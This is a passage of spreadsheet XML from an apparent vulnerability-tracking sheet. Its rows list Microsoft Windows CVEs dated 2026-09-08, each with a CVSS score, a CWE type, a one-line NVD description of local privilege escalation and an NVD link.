      <c r="L1337" s="5" t="inlineStr"/>
      <c r="M1337" s="5" t="inlineStr"/>
      <c r="N1337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1337" s="5" t="inlineStr"/>
      <c r="Q1337" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1337" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D1338" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1338" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1338" s="5" t="inlineStr"/>
      <c r="H1338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1338" s="5" t="inlineStr"/>
      <c r="J1338" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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38" s="5" t="inlineStr"/>
      <c r="M1338" s="5" t="inlineStr"/>
      <c r="N1338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1338" s="5" t="inlineStr"/>
      <c r="Q1338" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1338" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="D1339" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1339" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1339" s="5" t="inlineStr"/>
      <c r="H1339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1339" s="5" t="inlineStr"/>
      <c r="J1339" s="5" t="inlineStr"/>
      <c r="K1339" s="5" t="inlineStr"/>
      <c r="L1339" s="5" t="inlineStr"/>
      <c r="M1339" s="5" t="inlineStr"/>
      <c r="N1339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1339" s="5" t="inlineStr"/>
      <c r="Q1339" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1339" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="D1340" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1340" s="5" t="inlineStr"/>
      <c r="H1340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1340" s="5" t="inlineStr"/>
      <c r="J1340" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K134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40" s="5" t="inlineStr"/>
      <c r="M1340" s="5" t="inlineStr"/>
      <c r="N1340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1340" s="5" t="inlineStr"/>
      <c r="Q1340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1340" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68897</t>
        </is>
      </c>
      <c r="D1341" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1341" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1341" s="5" t="inlineStr"/>
      <c r="H1341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1341" s="5" t="inlineStr"/>
      <c r="J1341" s="5" t="inlineStr"/>
      <c r="K1341" s="5" t="inlineStr"/>
      <c r="L1341" s="5" t="inlineStr"/>
      <c r="M1341" s="5" t="inlineStr"/>
      <c r="N1341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1341" s="5" t="inlineStr"/>
      <c r="Q1341" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1341" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69275</t>
        </is>
      </c>
      <c r="D1342" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1342" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1342" s="5" t="inlineStr"/>
      <c r="H1342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1342" s="5" t="inlineStr"/>
      <c r="J1342" s="5" t="inlineStr"/>
      <c r="K1342" s="5" t="inlineStr"/>
      <c r="L1342" s="5" t="inlineStr"/>
      <c r="M1342" s="5" t="inlineStr"/>
      <c r="N1342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1342" s="5" t="inlineStr"/>
      <c r="Q1342" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1342" s="5" t="inlineStr">
        <is>
          <t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69279</t>
        </is>
      </c>
      <c r="D1343" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1343" s="5" t="inlineStr"/>
      <c r="H1343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1343" s="5" t="inlineStr"/>
      <c r="J1343" s="5" t="inlineStr"/>
      <c r="K1343" s="5" t="inlineStr"/>
      <c r="L1343" s="5" t="inlineStr"/>
      <c r="M1343" s="5" t="inlineStr"/>
      <c r="N1343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1343" s="5" t="inlineStr"/>
      <c r="Q1343" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1343" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69280</t>
        </is>
      </c>
      <c r="D1344" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1344" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1344" s="5" t="inlineStr"/>
      <c r="H1344" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1344" s="5" t="inlineStr"/>
      <c r="J1344" s="5" t="inlineStr"/>
      <c r="K1344" s="5" t="inlineStr"/>
      <c r="L1344" s="5" t="inlineStr"/>
      <c r="M1344" s="5" t="inlineStr"/>
      <c r="N1344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1344" s="5" t="inlineStr"/>
      <c r="Q1344" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1344" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69281</t>
        </is>
      </c>
      <c r="D1345" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1345" s="5" t="inlineStr"/>
      <c r="H1345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1345" s="5" t="inlineStr"/>
      <c r="J1345" s="5" t="inlineStr"/>
      <c r="K1345" s="5" t="inlineStr"/>
      <c r="L1345" s="5" t="inlineStr"/>
      <c r="M1345" s="5" t="inlineStr"/>
      <c r="N1345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1345" s="5" t="inlineStr"/>
      <c r="Q1345" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1345" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="D1346" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1346" s="5" t="inlineStr"/>
      <c r="H1346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1346" s="5" t="inlineStr"/>
      <c r="J1346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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46" s="5" t="inlineStr"/>
      <c r="M1346" s="5" t="inlineStr"/>
      <c r="N1346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1346" s="5" t="inlineStr"/>
      <c r="Q1346" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1346" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69292</t>
        </is>
      </c>
      <c r="D1347" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1347" s="5" t="inlineStr"/>
      <c r="H1347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1347" s="5" t="inlineStr"/>
      <c r="J1347" s="5" t="inlineStr"/>
      <c r="K1347" s="5" t="inlineStr"/>
      <c r="L1347" s="5" t="inlineStr"/>
      <c r="M1347" s="5" t="inlineStr"/>
      <c r="N1347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1347" s="5" t="inlineStr"/>
      <c r="Q1347" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1347" s="5" t="inlineStr">
        <is>
          <t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69299</t>
        </is>
      </c>
      <c r="D1348" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1348" s="5" t="inlineStr"/>
      <c r="H1348" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1348" s="5" t="inlineStr"/>
      <c r="J1348" s="5" t="inlineStr"/>
      <c r="K1348" s="5" t="inlineStr"/>
      <c r="L1348" s="5" t="inlineStr"/>
      <c r="M1348" s="5" t="inlineStr"/>
      <c r="N1348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1348" s="5" t="inlineStr"/>
      <c r="Q1348" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1348" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69300</t>
        </is>
      </c>
      <c r="D1349" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1349" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1349" s="5" t="inlineStr"/>
      <c r="H1349" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1349" s="5" t="inlineStr"/>
      <c r="J1349" s="5" t="inlineStr"/>
      <c r="K1349" s="5" t="inlineStr"/>
      <c r="L1349" s="5" t="inlineStr"/>
      <c r="M1349" s="5" t="inlineStr"/>
      <c r="N1349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1349" s="5" t="inlineStr"/>
      <c r="Q1349" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1349" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69309</t>
        </is>
      </c>
      <c r="D1350" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1350" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1350" s="5" t="inlineStr"/>
      <c r="H1350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1350" s="5" t="inlineStr"/>
      <c r="J1350" s="5" t="inlineStr"/>
      <c r="K1350" s="5" t="inlineStr"/>
      <c r="L1350" s="5" t="inlineStr"/>
      <c r="M1350" s="5" t="inlineStr"/>
      <c r="N1350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1350" s="5" t="inlineStr"/>
      <c r="Q1350" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1350" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="D1351" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1351" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1351" s="5" t="inlineStr"/>
      <c r="H1351" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1351" s="5" t="inlineStr"/>
      <c r="J1351" s="5" t="inlineStr"/>
      <c r="K1351" s="5" t="inlineStr"/>
      <c r="L1351" s="5" t="inlineStr"/>
      <c r="M1351" s="5" t="inlineStr"/>
      <c r="N1351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1351" s="5" t="inlineStr"/>
      <c r="Q1351" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1351" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69311</t>
        </is>
      </c>
      <c r="D1352" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1352" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1352" s="5" t="inlineStr"/>
      <c r="H1352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1352" s="5" t="inlineStr"/>
      <c r="J1352" s="5" t="inlineStr"/>
      <c r="K1352" s="5" t="inlineStr"/>
      <c r="L1352" s="5" t="inlineStr"/>
      <c r="M1352" s="5" t="inlineStr"/>
      <c r="N1352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1352" s="5" t="inlineStr"/>
      <c r="Q1352" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1352" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D1353" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1353" s="5" t="inlineStr"/>
      <c r="H1353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1353" s="5" t="inlineStr"/>
      <c r="J1353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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53" s="5" t="inlineStr"/>
      <c r="M1353" s="5" t="inlineStr"/>
      <c r="N1353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1353" s="5" t="inlineStr"/>
      <c r="Q1353" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1353" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69331</t>
        </is>
      </c>
      <c r="D1354" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1354" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1354" s="5" t="inlineStr"/>
      <c r="H1354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1354" s="5" t="inlineStr"/>
      <c r="J1354" s="5" t="inlineStr"/>
      <c r="K1354" s="5" t="inlineStr"/>
      <c r="L1354" s="5" t="inlineStr"/>
      <c r="M1354" s="5" t="inlineStr"/>
      <c r="N1354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1354" s="5" t="inlineStr"/>
      <c r="Q1354" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1354" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69333</t>
        </is>
      </c>
      <c r="D1355" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1355" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1355" s="5" t="inlineStr"/>
      <c r="H1355" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1355" s="5" t="inlineStr"/>
      <c r="J1355" s="5" t="inlineStr"/>
      <c r="K1355" s="5" t="inlineStr"/>
      <c r="L1355" s="5" t="inlineStr"/>
      <c r="M1355" s="5" t="inlineStr"/>
      <c r="N1355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1355" s="5" t="inlineStr"/>
      <c r="Q1355" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1355" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t>
        </is>
      </c>
    </row>
    <row r="1356">
